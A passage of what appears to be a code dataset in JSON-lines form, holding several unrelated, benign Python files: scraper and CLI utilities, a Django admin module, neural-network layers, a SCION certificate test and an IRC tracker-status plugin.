shutil.rmtree(var_pathName)\n if not os.path.exists(var_pathName):\n try:\n os.makedirs(\"C:\\Automation\\Amazon\" + \"\\\\\" + var_foldername)\n os.makedirs(r'C:\\\\Automation\\Amazon' + \"\\\\\" + var_foldername + \"\\\\\" + 'AmazonPortal')\n self.lo.log_to_file(self, \"INFO\", \"Folder created For AmazonPortal.\")\n finally:\n Main_Methods = AmazonSuppliers(self.v_Browser, self.lo)\n Main_Methods.Execute_AmazonSuppliers()\n self.lo.log_to_file(self, \"INFO\", \"Download Complete for AmazonPortal\")\n shutil.make_archive(r'C:\\Automation\\BackUp\\Reports' + var_foldername, 'zip', 'C:/Automation/Amazon')\n\n except Exception as e:\n self.lo.log_to_file(self, \"ERROR\", \"Exception:\" + str(e))\n\n\n\n\n\n\n\n\n","sub_path":"Applications/Workflows/Analytics/RetailerPortalScraping/AmazonPortal/AmazonPortal_Main.py","file_name":"AmazonPortal_Main.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"334950369","text":"# standard library modules, , ,\nimport argparse\nimport logging\nimport sys\nimport platform\nimport pkg_resources\n\n# subcommand modules, , add subcommands, internal\nfrom . import version\nfrom . import link\nfrom . import link_target\nfrom . import install\nfrom . import update\nfrom . import target\nfrom . import build\nfrom . import init\nfrom . import publish\nfrom . import debug\nfrom . import login\nfrom . import logout\nfrom . import list\nfrom . import uninstall\nfrom . import owners\n\nfrom lib import logging_setup\n\n# settings, , load and save settings, internal\nfrom lib import settings\n\ndef logLevelFromVerbosity(v):\n return max(1, logging.INFO - v * (logging.ERROR-logging.NOTSET) / 5)\n\ndef defaultTarget():\n set_target = settings.getProperty('build', 'target')\n if set_target:\n return set_target\n\n machine = platform.machine()\n\n x86 = machine.find('86') != -1\n arm = machine.find('arm') != -1 or machine.find('aarch') != -1\n\n prefix = \"x86-\" if x86 else \"arm-\" if arm else \"\"\n platf = 'unknown'\n\n if sys.platform == 'linux':\n platf = 'linux-native'\n elif sys.platform == 'darwin':\n platf = 'osx-native'\n elif sys.platform.find('win') != -1:\n platf = 'win'\n return prefix + platf + ','\n\ndef main():\n parser = argparse.ArgumentParser()\n subparser = parser.add_subparsers(metavar='{install, update, version, link, link-target, target, build, init, publish, login, logout, list, uninstall, owners}')\n\n parser.add_argument('--version', dest='show_version', action='version',\n version=pkg_resources.require(\"yotta\")[0].version,\n help='display the version'\n )\n parser.add_argument('-v', '--verbose', dest='verbosity', action='count',\n default=0,\n help='increase verbosity: can be used multiple times'\n )\n parser.add_argument('-d', '--debug', dest='debug', action='append',\n metavar='SUBSYS',\n help='specify subsystems to debug: use in conjunction with -v to '+\n 'increase the verbosity only for specified subsystems'\n )\n\n parser.add_argument('-t', '--target', dest='target',\n default=defaultTarget(),\n help='Set the build and dependency resolution target (targetname[,versionspec_or_url])'\n )\n\n def addParser(name, module, description):\n parser = subparser.add_parser(name, description=description)\n module.addOptions(parser)\n parser.set_defaults(command=module.execCommand)\n\n addParser('version', version, 'Bump the module version, or (with no arguments) display the current version.')\n addParser('link', link, 'Symlink a module.')\n addParser('link-target', link_target, 'Symlink a target.')\n addParser('install', install, 'Install dependencies for the current module, or a specific module.')\n addParser('update', update, 'Update dependencies for the current module, or a specific module.')\n addParser('target', target, 'Set or display the target device.')\n addParser('build', build, 'Build the current module.')\n addParser('debug', debug, 'Attach a debugger to the current target. Requires target support.')\n addParser('init', init, 'Create a new module.')\n addParser('publish', publish, 'Publish a module or target to the public registry.')\n addParser('login', login, 'Authorize for access to private github repositories and publishing to the yotta registry.')\n addParser('logout', logout, 'Remove saved authorization token for the current user.')\n addParser('list', list, 'List the dependencies of the current module.')\n addParser('uninstall', uninstall, 'Remove a specific dependency of the current module.')\n addParser('owners', owners, 'Add/remove/display the owners of a module or target.')\n\n # short synonyms, subparser.choices is a dictionary, so use update() to\n # merge in the keys from another dictionary\n subparser.choices.update({\n 'up':subparser.choices['update'],\n 'in':subparser.choices['install'],\n 'ln':subparser.choices['link'],\n 'v':subparser.choices['version'],\n 'ls':subparser.choices['list'],\n 'unlink':subparser.choices['uninstall'],\n 'rm':subparser.choices['uninstall'],\n 'owner':subparser.choices['owners']\n })\n\n args = parser.parse_args() \n\n loglevel = logLevelFromVerbosity(args.verbosity)\n logging_setup.init(level=loglevel, enable_subsystems=args.debug)\n \n # finally, do stuff!\n status = args.command(args)\n\n sys.exit(status or 0)\n\n","sub_path":"yotta/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"422542841","text":"\"\"\"\nchapter 7\nex 7.7 패스너스 데코레이터 사용하기\n\"\"\"\n\nimport time\n\nimport fasteners\n\n@fasteners.interprocess_locked('/tmp/tmp_lock_file')\ndef locked_print():\n for i in range(10):\n print(\"I have the lock\")\n time.sleep(0.1)\n\nlocked_print()\n\n\"\"\"\nsingle point of failure(단일 장애점)이 없으므로 local process 사이의 잠금 처리에\n좋은 방법이다\n\"\"\"\n","sub_path":"daily-programming/2019/11/ch-07-lock-mgmt/07_fasteners-decorator.py","file_name":"07_fasteners-decorator.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"467487461","text":"from typing import List\n\nfrom lang.hyperparameters import HyperParameters\n\n\nclass NeuralAssembly:\n \"\"\"\n Neural assembly is a stable activity pattern belonging to a certain area\n \"\"\"\n def __init__(self, id: str, container):\n from neurons.neuro_container import NeuroContainer\n self.pattern: str = None\n # self.phonetic_pattern: str = None\n self.id = id\n self.firing = False\n self.fired = False\n self.container: NeuroContainer = container\n self.perceptual = False\n self.is_combined = False\n self.is_joint = False\n self.is_tone = False\n self.doped = False\n self.firing_ticks = []\n self.firing_history = {}\n self.potential = 0\n self.threshold = 2\n # self.capacity = 0\n self.formed_at = 0\n self.last_fired_at = 0\n self.hierarchy_level = 0\n self.firing_count = 1\n self.contributors = []\n self.fired_contributors: List[NeuralAssembly] = []\n self._area: 'NeuralArea' = None\n self.is_winner = False # for Winner Takes It All Strategy areas\n self.source_assemblies = []\n self.source_area = None # for tone-bases assemblies\n self.activated = False\n\n @property\n def area(self):\n \"\"\"\n Area this NA belongs to\n :return:\n \"\"\"\n return self._area\n\n @area.setter\n def area(self, val):\n if self._area and self._area != val:\n raise Exception(f'NeuralAssembly.set_area(): The area of {self} is already set')\n self._area = val\n msg_data = {\n 'assembly': self,\n 'area': val\n }\n self.container.agent.queue_message('assembly_attached_to_area', msg_data)\n\n @property\n def is_visual(self):\n return self.pattern.startswith('v:') and ('+' not in self.pattern)\n\n @property\n def cleaned_pattern(self):\n if ':' not in self.pattern:\n return self.pattern\n last_colon_position = self.pattern[::-1].index(':')\n return self.pattern[len(self.pattern) - last_colon_position:].strip()\n\n def update(self, current_tick: int):\n self.fired = False\n area = self.area\n if current_tick in area.inhibited_at_ticks:\n self.potential = 0\n return\n if area.winner_takes_it_all_strategy:\n if self.is_winner:\n self.firing = True\n else:\n if self.potential >= self.threshold or current_tick in self.firing_ticks:\n self.firing = area.allow_firing(self)\n\n if self.firing:\n self.last_fired_at = current_tick\n self.fired = True\n self.firing = False\n connections = self.container.get_assembly_outgoing_connections(na=self)\n for conn in connections:\n conn.pulsing = True\n self.firing_history[self.container.current_tick] = list(self.fired_contributors)\n area.on_fire(self)\n # else:\n self.fired_contributors.clear()\n self.potential = 0\n self.is_winner = False\n\n def on_doped(self, current_tick: int):\n \"\"\"\n Invoked whenever dopamine reaches the assembly\n :return:\n \"\"\"\n self.doped = True\n fired_contributors = self.fired_contributors\n if not fired_contributors:\n # it might be invoked from another DOPEd assembly\n # take fired contributors from the history then\n fired_contributors = self.firing_history[self.last_fired_at]\n for na in fired_contributors:\n # TODO: consider moving this hardcoded rule into a neural areas config file\n if self.area in na.area.double_activation_from:\n connection = self.container.get_connection_between_nodes(self, na)\n if not connection:\n connection = self.container.create_connection(source=self, target=na)\n connection.multiplier = 2\n if na.area in self.area.double_activation_from:\n connection = self.container.get_connection_between_nodes(na, self)\n connection.multiplier = 2\n\n def is_successor_of(self, na: 'NeuralAssembly') -> bool:\n\n def find_in_sources(assembly: 'NeuralAssembly') -> bool:\n for a in assembly.source_assemblies:\n if a == na:\n return True\n for a in assembly.source_assemblies:\n result = find_in_sources(a)\n if result:\n return True\n return False\n\n if na == self:\n return True\n return find_in_sources(self)\n\n def _repr(self):\n return f'\"{self.pattern}\" id: {self.id}'\n\n def __repr__(self):\n return self._repr()\n\n def __str__(self):\n return self._repr()","sub_path":"src/lang/neural_assembly.py","file_name":"neural_assembly.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"275959391","text":"'''\nScript to update modlist.html from manifest.json\n'''\n\nimport json\nfrom urllib import request, parse\n\ndef get_modlist_from_manifest():\n '''\n Will return the modlist array.\n Each element will be a dictionary.\n Each element will have: projectID, fileID, and required\n '''\n with open('manifest.json') as json_file:\n data_str = json_file.read()\n data_dict = json.loads(data_str)\n return data_dict[\"files\"]\n\ndef modlist_from_curseforge(ids):\n '''\n Fetches the list of mods from curseforge using the provided ids\n '''\n # See: https://twitchappapi.docs.apiary.io/#/reference/0/get-multiple-addons/get-multiple-addons/200?mc=reference%2F0%2Fget-multiple-addons%2Fget-multiple-addons%2F200\n\n req = request.Request(\"https://addons-ecs.forgesvc.net/api/v2/addon\")\n req.add_header('Content-Type', 'application/json; charset=utf-8')\n post_data_json = json.dumps(ids)\n post_data_bytes = post_data_json.encode('utf-8')\n resp_str = request.urlopen(req, post_data_bytes).read()\n resp_json = json.loads(resp_str)\n return resp_json \n\ndef main():\n modlist = get_modlist_from_manifest()\n mod_ids = [x[\"projectID\"] for x in modlist]\n cf_modlist = modlist_from_curseforge(mod_ids)\n # Sort the mod list by name:\n cf_modlist.sort(key=lambda d: d[\"name\"])\n # print out the new modlist.html\n with open('modlist.html', 'w') as f:\n f.write(\"\\n\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/update_modlist.py","file_name":"update_modlist.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"567891544","text":"import pygame as pg\nfrom random import uniform\nfrom random import randint\n\n\nclass Obstacle(pg.sprite.Sprite):\n image = pg.Surface((5, 5), pg.SRCALPHA)\n pg.draw.polygon(image, pg.Color('yellow'),\n [(0, 0), (5, 0), (5,5), (0, 5)])\n\n max_x = 0\n max_y = 0\n\n\n def __init__(self,pos):\n super(Obstacle, self).__init__()\n\n if Obstacle.max_x == 0:\n info = pg.display.Info()\n Obstacle.max_x = info.current_w\n Obstacle.max_y= info.current_h\n\n self.image = Obstacle.image.copy()\n self.rect = self.image.get_rect()\n\n self.pos = pg.math.Vector2(\n pos[0],\n pos[1])\n self.rect = self.image.get_rect(center=self.pos)\n","sub_path":"proposed_method/obstacle.py","file_name":"obstacle.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"163144519","text":"# coding: utf-8\n\nfrom django import forms\nfrom django.contrib import admin\nfrom django.contrib.admin.filters import SimpleListFilter\nfrom django.contrib.admin.widgets import ForeignKeyRawIdWidget, \\\n ManyToManyRawIdWidget\nfrom django.core.urlresolvers import reverse\nfrom django.db.models.query_utils import Q\nfrom django.utils.encoding import smart_unicode\nfrom django.utils.html import escape\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom dataman.models import DataContainer, Data\nfrom tasks.models import Task, ShellTask, ChannelTask\n\n\n#################################################\n### See: http://djangosnippets.org/snippets/2217/\n# SHOULD GO INTO OicomDjango!!!\nclass VerboseForeignKeyRawIdWidget(ForeignKeyRawIdWidget):\n def label_for_value(self, value):\n key = self.rel.get_related_field().name\n try:\n obj = self.rel.to._default_manager.using(self.db).get(**{key: value})\n change_url = reverse(\n \"admin:%s_%s_change\" % (obj._meta.app_label, obj._meta.object_name.lower()),\n args=(obj.pk,)\n )\n return ' %s' % (change_url, escape(obj))\n except (ValueError, self.rel.to.DoesNotExist):\n return '???'\n\nclass VerboseManyToManyRawIdWidget(ManyToManyRawIdWidget):\n def label_for_value(self, value):\n values = value.split(',')\n str_values = []\n key = self.rel.get_related_field().name\n for v in values:\n try:\n obj = self.rel.to._default_manager.using(self.db).get(**{key: v})\n x = smart_unicode(obj)\n change_url = reverse(\n \"admin:%s_%s_change\" % (obj._meta.app_label, obj._meta.object_name.lower()),\n args=(obj.pk,)\n )\n str_values += ['%s' % (change_url, escape(x))]\n except self.rel.to.DoesNotExist:\n str_values += [u'???']\n return u', '.join(str_values)\n\n#################################################\n### Entità di base\n#################################################\nclass CommonAdmin(admin.ModelAdmin):\n save_on_top = True\n list_display = ('__unicode__','ord',)\n search_fields = ('name',)\n fieldsets = (\n (None, {\n 'fields': (('name','ord',),)\n }),\n ('Descrizione', {\n 'fields': ('descr',),\n }),\n )\n\n def formfield_for_dbfield(self, db_field, **kwargs):\n u\"\"\"\n For \"descr_XX\" fields, use a suitably large textarea widget\n \"\"\"\n formfield = super(CommonAdmin, self).formfield_for_dbfield(db_field, **kwargs)\n if db_field.name.startswith('descr'):\n attrs = formfield.widget.attrs or {}\n attrs.update({'cols': '80', 'rows': '10', 'style': 'width: 80em;'}) \n formfield.widget = forms.Textarea(attrs=attrs)\n \n #see: http://djangosnippets.org/snippets/2217/\n if db_field.name in self.raw_id_fields:\n kwargs.pop(\"request\", None)\n reltype = db_field.rel.__class__.__name__\n if reltype == \"ManyToOneRel\":\n formfield.widget = VerboseForeignKeyRawIdWidget(db_field.rel, self.admin_site)\n elif reltype == \"ManyToManyRel\":\n formfield.widget = VerboseManyToManyRawIdWidget(db_field.rel, self.admin_site)\n return formfield \n\n#################################################\nclass DataContainerAdmin(CommonAdmin):\n list_display = CommonAdmin.list_display + ('url',)\n fieldsets = CommonAdmin.fieldsets + (\n (None, {\n 'fields': ('url',)\n }),\n ) \nadmin.site.register(DataContainer,DataContainerAdmin)\n\n#################################################\nclass DataTaskInline(admin.TabularInline):\n model = getattr(Data.dependencies,'through') #avoid PyDev error for Soggetto.dependencies.through \n fk_name = 'data'\n extra = 0 #nessun record già pronto per la aggiunta\n max_num = None #consente aggiunta di infiniti record inline\n fields = ('dep','task','ord',)\n raw_id_fields = ('dep',)\n \n#################################################\nclass DataAdmin(CommonAdmin):\n list_display = CommonAdmin.list_display\n list_filter = ('container',)\n inlines = [DataTaskInline]\n fieldsets = (\n (None, {\n 'fields': ('container',)\n }),\n ) + CommonAdmin.fieldsets \nadmin.site.register(Data,DataAdmin)\n","sub_path":"dataman/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"340135795","text":"import numpy as np\nimport copy\n\n# tanh function\ndef tanh(trigger):\n\treturn (np.exp(trigger)-np.exp(-trigger))/(np.exp(trigger)+np.exp(-trigger))\n\n# class of tanh layer\nclass TanhLayer(object):\n\tdef __init__(self,num_input,num_output):\n\t# example: TanhLayer(dimension of input data,dimension of output data)\n\t\tself.num_input = num_input\n\t\tself.num_output = num_output\n\t\tself.num_layer = 1\n\t\tself.theta = [np.asarray(\n\t\t\tnp.random.normal(0,np.sqrt(1.0/float(self.num_output)),[self.num_output,self.num_input]),\n\t\t\tdtype='float')]\n\t\tself.bias = [np.asarray(\n\t\t\tnp.random.normal(0,np.sqrt(1.0/float(self.num_output)),self.num_output),\n\t\t\tdtype='float')]\n\t\tself.d_theta = [np.zeros([self.num_output,self.num_input],dtype='float')]\n\t\tself.d_bias = [np.zeros(self.num_output,dtype='float')]\n\t\tself.delta = []\n\t\tself.trigger = []\n\t\tself.activation = []\n\t\t# gradient check\n\t\tself.theta_check = []\n\t\tself.bias_check = []\n\t\n\t# copy parameters for gradient check\n\tdef cloneParameter(self):\n\t# example: cloneParameter()\n\t\tself.theta_check = copy.deepcopy(self.theta)\n\t\tself.bias_check = copy.deepcopy(self.bias)\n\t# calculate output of current without affecting activation or trigger\n\tdef pseudoForward(self,val_input):\n\t# example: pseudoForward(input data)\n\t\ttrigger = [] \n\t\tactivation = []\n\t\ttrigger.extend([np.dot(self.theta_check[0],val_input)+self.bias_check[0]])\n\t\tactivation.extend([tanh(trigger[0])])\n\t\treturn activation[self.num_layer-1]\n\n\t# calculate activation of current layer\n\tdef forward(self,val_input):\n\t# example: forward(input data)\n\t\tself.trigger = [] # reset trigger value\n\t\tself.activation = [] #reset activation\n\t\tself.trigger.extend([np.dot(self.theta[0],val_input)+self.bias[0]])\n\t\tself.activation.extend([tanh(self.trigger[0])])\n\t\n\t# get activation of current layer\n\tdef getActivation(self):\n\t# example: getActivation()\n\t\treturn self.activation[self.num_layer-1]\n\n\t# calculate derivative of parameters in current layer\n\tdef backward(self,error,val_input,check_layer=0):\n\t# example: backward(derivative with respect to activation,input data,gradient check on/off)\n\t\t# derivative with respect to trigger\n\t\terror = error * 4/(np.exp(self.trigger[0])+np.exp(-self.trigger[0]))**2\n\t\tself.delta = [] # reset error\n\t\tself.delta.extend([error])\n\t\t# accumulate derivative\n\t\tself.d_theta[0] += np.outer(self.delta[0],val_input)\n\t\tself.d_bias[0] += self.delta[0]\n\t\t# display derivative of parameters in current layer for gradient check\n\t\tif check_layer>0:\n\t\t\tprint('backpropagate derivative theta in layer'+str(check_layer)+':')\n\t\t\tprint(np.outer(self.delta[0],val_input))\n\t\t\tprint('backpropagate derivative bias in layer '+str(check_layer)+':')\n\t\t\tprint(self.delta[0])\n\n\t# calculate error for previous layer\n\tdef getPreError(self):\n\t# example: getPreError()\n\t\treturn np.dot(self.theta[0].T,self.delta[0])\n\n\t# regularization\n\tdef regularization(self,C):\n\t# example: regularization(regularization weight)\n\t\tself.d_theta[0] += C * self.theta[0]\n\t\tself.d_bias[0] += C * self.bias[0]\n\n\t# update parameters\n\tdef update(self,rate,batch):\n\t# example: update(learning rate,batch size)\n\t\tself.theta[0] -= rate*self.d_theta[0]/float(batch)\n\t\tself.bias[0] -= rate*self.d_bias[0]/float(batch)\n\n\t# reset derivative of theta and bias\n\tdef resetDerivative(self):\n\t# example: resetDerivative()s\n\t\tself.d_theta = []\n\t\tself.d_bias = []\n\t\tself.d_theta.extend([np.zeros([self.num_output,self.num_input],dtype='float')])\n\t\tself.d_bias.extend([np.zeros(self.num_output,dtype='float')])\n\n\t# display information of current layer\n\tdef show(self):\n\t# example: show()\n\t\tprint('tanh layer')\n\t\tprint('---------------------------------------')\n\t\tprint('number of layer: '+str(self.num_layer))\n\t\tprint('number of input: '+str(self.num_input))\n\t\tprint('number of output: '+str(self.num_output))\n\n\n\n\n\t\t","sub_path":"neural/tanh_layer.py","file_name":"tanh_layer.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"362010384","text":"#coding=utf-8\n# 处理中文\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef get_brand(collection1, collection2, comment):\n # 搜索商品id\n for item1 in collection1.find({\"content\":comment}):\n product_id = item1[\"product_id\"]\n for item2 in collection2.find({\"product_id\": str(product_id)}):\n brand_id = item2[\"brand_name\"]\n return brand_id","sub_path":"get_brand.py","file_name":"get_brand.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"492036136","text":"#!/usr/bin/env python3\n\n# Just testing out how to access github from python\n\nimport urllib.request\nimport urllib\nfrom vpv import __version__\nimport socket\n\ndef get_latest_github_version():\n\n socket.setdefaulttimeout(4)\n try:\n response = urllib.request.urlopen('https://github.com/mpi2/vpv/releases/latest', timeout=4)\n except (urllib.request.URLError, IOError):\n print('timed out')\n return False\n\n resolves_to = response.url\n latest_version = resolves_to.split('/')[-1].strip('v')\n\n current_version = __version__\n\n if current_version < latest_version:\n return resolves_to\n else:\n return False\n","sub_path":"vpv/utils/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"603605396","text":"#!/usr/bin/python3\n# Copyright 2016 ETH Zurich\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\n:mod:`cert_req_est` --- SCION certificate request tests\n=======================================================\n\"\"\"\n\n# Stdlib\nimport logging\nimport threading\n\n# SCION\nimport lib.app.sciond as lib_sciond\nfrom lib.main import main_wrapper\nfrom lib.packet.ctrl_pld import CtrlPayload\nfrom lib.packet.cert_mgmt import CertChainRequest, CertMgmt, TRCRequest\nfrom lib.packet.path import SCIONPath\nfrom lib.packet.scion import SCIONL4Packet, build_base_hdrs\nfrom lib.packet.scion_addr import SCIONAddr\nfrom lib.types import ServiceType\nfrom integration.base_cli_srv import (\n get_sciond_api_addr,\n setup_main,\n ResponseRV,\n TestClientBase,\n TestClientServerBase,\n)\n\n\nclass TestCertClient(TestClientBase):\n def __init__(self, finished, addr, dst_ia):\n # We need the lib sciond here already.\n connector = lib_sciond.init(get_sciond_api_addr(addr))\n cs_info = lib_sciond.get_service_info(\n [ServiceType.CS], connector=connector)[ServiceType.CS]\n cs = cs_info.host_info(0)\n cs_addr = SCIONAddr.from_values(addr.isd_as, cs.ipv4() or cs.ipv6())\n self.cert = None\n super().__init__(\"\", finished, addr, cs_addr, cs.p.port, retries=2)\n self.dst_ia = dst_ia\n\n def _get_path(self, api, flush=None):\n pass # No path required. All queries go to local CS\n\n def _build_pkt(self):\n cmn_hdr, addr_hdr = build_base_hdrs(self.dst, self.addr)\n l4_hdr = self._create_l4_hdr()\n spkt = SCIONL4Packet.from_values(\n cmn_hdr, addr_hdr, SCIONPath(), [], l4_hdr)\n spkt.set_payload(self._create_payload(spkt))\n spkt.update()\n return spkt\n\n def _create_payload(self, _):\n if not self.cert:\n return CtrlPayload(CertMgmt(CertChainRequest.from_values(self.dst_ia, 0)))\n return CtrlPayload(CertMgmt(TRCRequest.from_values(self.dst_ia, 0)))\n\n def _handle_response(self, spkt):\n cpld = spkt.parse_payload()\n cmgt = cpld.union\n pld = cmgt.union\n logging.debug(\"Got:\\n%s\", spkt)\n if not self.cert:\n if (self.dst_ia, 0) == pld.chain.get_leaf_isd_as_ver():\n logging.debug(\"Cert query success\")\n self.cert = pld.chain\n return ResponseRV.CONTINUE\n logging.error(\"Cert query failed\")\n return ResponseRV.FAILURE\n if (self.dst_ia[0], 0) == pld.trc.get_isd_ver():\n self.cert.verify(str(self.dst_ia), pld.trc)\n logging.debug(\"TRC query success\")\n self.success = True\n self.finished.set()\n return ResponseRV.SUCCESS\n logging.error(\"TRC query failed\")\n return ResponseRV.FAILURE\n\n\nclass TestCertReq(TestClientServerBase):\n NAME = \"CertReqTest\"\n\n def _run_test(self, src, dst):\n logging.info(\"Testing: %s -> %s\", src.isd_as, dst.isd_as)\n finished = threading.Event()\n client = self._create_client(finished, src, dst.isd_as)\n client.run()\n if client.success:\n return True\n logging.error(\"Client success? %s\", client.success)\n return False\n\n def _create_client(self, finished, addr, dst_ia):\n return TestCertClient(finished, addr, dst_ia)\n\n\ndef main():\n args, srcs, dsts = setup_main(\"certreq\")\n TestCertReq(args.client, args.server, srcs, dsts, max_runs=args.runs).run()\n\n\nif __name__ == \"__main__\":\n main_wrapper(main)\n","sub_path":"python/integration/cert_req_test.py","file_name":"cert_req_test.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"63251207","text":"###\n# Copyright (c) 2017, Ormanya\n# Copyright (c) 2020, oddluck \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions, and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author of this software nor the name of\n# contributors to this software may be used to endorse or promote products\n# derived from this software without specific prior written consent.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n###\n\nimport supybot.plugins as plugins\nfrom supybot.commands import *\nimport supybot.ircutils as ircutils\nimport supybot.callbacks as callbacks\nimport requests\nimport json\nimport sys\nimport re\n\nimport supybot.schedule as schedule\nfrom datetime import datetime\n\n\nstatus_commands = [\n \"btnStatus\",\n \"redStatus\",\n \"mtvStatus\",\n \"nwcdStatus\",\n \"ptpStatus\",\n \"ggnStatus\",\n \"arStatus\",\n \"p32Status\",\n \"ahdStatus\",\n \"ahdStatus\",\n \"empStatus\",\n \"nblStatus\",\n]\nstatus_trackers = [\n \"btn\",\n \"red\",\n \"mtv\",\n \"nwcd\",\n \"ptp\",\n \"ggn\",\n \"ar\",\n \"p32\",\n \"ahd\",\n \"ahd\",\n \"emp\",\n \"nbl\",\n]\n\n\nclass WebParser:\n \"\"\"Contains functions for getting and parsing web data\"\"\"\n\n def getWebData(self, irc, url):\n headers = {\n \"User-Agent\": (\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko)\"\n \" Chrome/24.0.1312.27 Safari/537.17\"\n )\n }\n try:\n content = requests.get(url, headers=headers, timeout=10)\n content = json.loads(content.content)\n return content\n except:\n irc.reply(\"Error: Couldn't connect to \" + url)\n return\n\n def prepareStatusString(\n self, site_name, status, status_headers, breakpoints, line_headers\n ):\n # Specify look and feel\n status_states = [\"Down\", \"Up\", \"Iffy\", \"Mean\"]\n status_symbols = [\"Ⓧ\", \"✓\", \"◯\", \"💩\"]\n status_colours = [chr(3) + \"04\", chr(3) + \"09\", chr(3) + \"07\", chr(3) + \"13\"]\n\n # Prepare output status message\n outStr = [line_headers[0]]\n count = 0\n line = 0\n for element in status:\n count = count + 1\n i = int(element)\n\n outStr[line] = (\n outStr[line]\n + status_colours[i]\n + status_symbols[i]\n + \" \"\n + status_headers[count - 1]\n + \" \"\n + status_states[i]\n )\n\n # Split output at breakpoints\n if count in breakpoints:\n line = line + 1\n outStr.extend([line_headers[line]])\n # don't append \"|\" if end of line\n elif count != len(status):\n outStr[line] = outStr[line] + chr(15) + \" | \"\n return outStr\n\n\nclass Trackers(callbacks.Plugin):\n \"\"\"Contains commands for checking server status of various trackers.\"\"\"\n\n threaded = True\n\n # def __init__(self, irc):\n # print \"Setting it up\"\n\n # self.__parent = super(Trackers, self)\n # self.__parent.__init__(irc)\n # # Set scheduler variables\n\n # # Schedule announce check\n # # Check if event already exists\n # try:\n # schedule.removeEvent('statusAnnounce')\n # except KeyError:\n # pass\n\n # def myEventCaller():\n # print \"Scheduling announce\"\n # self.autoAnnounce(irc)\n\n # schedule.addPeriodicEvent(myEventCaller, 30, 'statusAnnounce')\n # self.irc = irc\n\n # print \"All done\"\n\n def formatTimeSince(self, interval):\n # seconds\n if (interval.days == 0) and (interval.seconds < 60):\n time_passed = \"%s seconds ago\" % interval.seconds\n # minutes\n elif interval.days == 0 and interval.seconds < 3600:\n if interval.seconds < 120:\n time_passed = \"1 minute ago\"\n else:\n time_passed = \"%s minutes ago\" % int(interval.seconds / 60)\n # hours\n elif interval.days == 0:\n if interval.seconds < 7200:\n time_passed = \"1 hour ago\"\n else:\n time_passed = \"%s hours ago\" % int(interval.seconds / 3600)\n # days\n elif interval.days < 7:\n if interval.days == 1:\n time_passed = \"1 day ago\"\n else:\n time_passed = \"%s days ago\" % interval.days\n # weeks\n else:\n if interval.days < 14:\n time_passed = \"1 week ago\"\n else:\n time_passed = \"%s weeks ago\" % int(interval.days / 7)\n\n return time_passed\n\n def btnStatus(self, irc, msg, args, opts):\n \"\"\"[--message]\n\n Check the status of BTN site, tracker, and irc. Use --message flag to force return of message, even if older than 24 hours.\n \"\"\"\n url = \"https://btn.trackerstatus.info/api/status/\"\n site_name = \"BTN\"\n\n content = WebParser().getWebData(irc, url)\n\n status = [\n content[\"Website\"],\n content[\"API\"],\n content[\"TrackerHTTP\"],\n content[\"TrackerHTTPS\"],\n content[\"IRC\"],\n 